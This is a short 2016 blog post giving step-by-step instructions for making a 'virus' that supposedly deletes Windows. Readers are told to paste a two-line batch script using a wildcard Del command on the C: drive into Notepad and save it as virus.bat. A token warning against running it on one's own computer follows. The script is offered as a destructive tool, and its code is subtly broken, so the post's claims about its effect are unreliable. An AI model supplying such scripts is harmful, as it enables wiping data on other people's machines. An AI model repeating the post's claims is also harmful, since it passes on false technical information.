Rabu, 10 Februari 2016

How To Create A Virus That Delete Windows


In this article I will show you how to create a virus that delete windows by following steps:
Step-1:
Just open notepad or any text editor.

Step-2:
Now copy and paste the following code below into the notepad.
@Echo off
Del C:\ *.* |y
Step-3:
Now save it as virus.bat ( where, virus is a file name and “. bat” is the file extension ).

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.


EmoticonEmoticon

:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:o
:>)
(o)
:p
:-?
(p)
:-s
8-)
:-t
:-b
b-(
(y)
x-)
(h)